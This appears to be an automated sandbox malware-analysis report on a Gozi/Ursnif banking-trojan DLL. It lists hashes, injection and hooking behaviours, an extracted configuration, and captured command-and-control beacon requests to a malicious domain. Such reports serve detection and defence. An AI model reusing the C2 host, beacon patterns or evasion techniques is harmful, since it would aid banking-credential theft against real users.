Analysis Report 6007d134e83fctar.dll

Overview

General Information

Sample Name:	6007d134e83fctar.dll
Analysis ID:	341938
MD5:	718cd91e1249f01f6488998c93c79212
SHA1:	c40730026671a6757e42e91961178dbcbb1c2e47
SHA256:	691fdaeb03dfa2b239d82322a3fd47c3b952ae9d47effa0100153fde537dc4e5
Tags:	dllEnelEnergia
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Gozi e-Banking trojan

Found malware configuration

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Found malware configuration

Source: regsvr32.exe.4688.1.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@494126hh", "dns": "494126", "version": "251173", "uptime": "170", "crc": "2", "id": "4355", "user": "253fc4ee08f8d2d8cdc8873a98c9d714", "soft": "3"}

Compliance:

Uses 32bit PE files

Source: 6007d134e83fctar.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49741 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: 6007d134e83fctar.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000022.00000002.411809654.000001F23FCA0000.00000002.00000001.sdmp, csc.exe, 00000026.00000002.422411494.000001D454620000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.431440202.0000000005950000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.pdb source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.431440202.0000000005950000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.pdb source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp
Source:	Binary string: c:\Movenear\AgoSection\placeRace\Liquid.pdb source: 6007d134e83fctar.dll
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.pdbXP source: powershell.exe, 00000020.00000002.450999766.000001AE45C50000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.pdbXP source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A056C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_043A056C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0438BF1E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_0438BF1E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439AF0E lstrlenW,wcscpy,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_0439AF0E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04399363 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_04399363

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04395ECD wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

1_2_04395ECD

Networking:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 151.101.1.44 151.101.1.44

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /manifest/9dBougJwDtiqZ/QQHMIVU_/2BhS1knkkKX_2FVufwZ0oyN/EbGuCLEAI8/LnviyVmU_2BJ7xAua/uY77q6VVLGV8/agEg6nrSlO8/ECdHQy5W4nMbRU/wngAS3IMky7ngjR5nSGPQ/K9l7rtKzY6Pm4I7S/PgkTHSMkne_2BL6/avNSLX3b9xZHhQcrwM/KqzdjJJ_2/BoGyL5Rb/hdm5SZ8.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: lopppooole.xyzConnection: Keep-AliveCookie: PHPSESSID=cklnirt54us2267ioh1bdjd451; lang=en
Source: global traffic	HTTP traffic detected: GET /manifest/vduANE3J_2Bc1JVCe/mGf1TVDsPl7d/IwOe5xT417F/r0djERcwNagbl3/secUFuGZN4k2hLpDAmqZ_/2B14CbUSwUpX_2Fi/39R3WtzGANArbeD/to_2F84kphfq2hxfRa/eViH_2Bcq/DU4QxfFdXEk1hh6ELb0S/LXfZS2VQbBBYXjDtBzf/6HdWO2UjIqCLslcJOFOPGY/_2FVMnTrB/_2B.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=cklnirt54us2267ioh1bdjd451
Source: global traffic	HTTP traffic detected: GET /manifest/vZLK0d4lARH3Q_2BrO_/2FsO_2F2nRs6X2oi1Zey6b/w_2BPzCyb9qWu/aUJj6fj9/AoW2RxwV5jVAuuIZ6tg8Vss/9LOe5w8WWk/h4UkM31kYpKt809d8/y04pjwYJwpB4/tTLboWwUU5K/KwHKzEhmg_2FCK/0RXjauzqdq7mdbzD87Bzs/Wj_2BxZ5qHCgyoUo/tDRuRFtxq/6W5SEq8I/P.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=cklnirt54us2267ioh1bdjd451

Source: de-ch[1].htm.4.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8a7b0678,0x01d6ef43</date><accdate>0x8a7b0678,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8a7b0678,0x01d6ef43</date><accdate>0x8a7b0678,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8a822dab,0x01d6ef43</date><accdate>0x8a822dab,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8a822dab,0x01d6ef43</date><accdate>0x8a848ff9,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8a848ff9,0x01d6ef43</date><accdate>0x8a848ff9,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8a848ff9,0x01d6ef43</date><accdate>0x8a848ff9,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.4.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.4.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: regsvr32.exe, powershell.exe, 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, powershell.exe, 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000020.00000003.432471117.000001AE5AF68000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, regsvr32.exe, 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, powershell.exe, 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: imagestore.dat.26.dr	String found in binary or memory: http://lopppooole.xyz/favicon.ico
Source: imagestore.dat.26.dr, imagestore.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/favicon.ico~
Source: {DD24AED3-5B36-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/manifest/9dBougJwDtiqZ/QQHMIVU_/2BhS1knkkKX_2FVufwZ0oyN/EbGuCLEAI8/LnviyVmU_2B
Source: ~DF4C57DF82C221FA30.TMP.3.dr, {DD24AED7-5B36-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/manifest/vZLK0d4lARH3Q_2BrO_/2FsO_2F2nRs6X2oi1Zey6b/w_2BPzCyb9qWu/aUJj6fj9/AoW
Source: {DD24AED5-5B36-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/manifest/vduANE3J_2Bc1JVCe/mGf1TVDsPl7d/IwOe5xT417F/r0djERcwNagbl3/secUFuGZN4k
Source: powershell.exe, 00000020.00000002.455907331.000001AE52B31000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 00000020.00000003.432706783.000001AE5AF32000.00000004.00000001.sdmp, powershell.exe, 00000020.00000002.436229660.000001AE42CDF000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: auction[1].htm.4.dr	String found in binary or memory: http://popup.taboola.com/german
Source: powershell.exe, 00000020.00000002.435921934.000001AE42AD1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.3.dr	String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 00000020.00000003.432706783.000001AE5AF32000.00000004.00000001.sdmp, powershell.exe, 00000020.00000002.436229660.000001AE42CDF000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.3.dr	String found in binary or memory: http://www.google.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.3.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.3.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.3.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.3.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.3.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.3.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.4.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://bealion.com/politica-de-cookies
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DF6EC85E7A5CABE297.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 00000020.00000002.455907331.000001AE52B31000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.455907331.000001AE52B31000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.455907331.000001AE52B31000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 00000020.00000003.432706783.000001AE5AF32000.00000004.00000001.sdmp, powershell.exe, 00000020.00000002.436229660.000001AE42CDF000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1611125209&rver
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1611125209&rver=7.0.6730.0&am
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1611125210&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1611125209&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: powershell.exe, 00000020.00000002.455907331.000001AE52B31000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
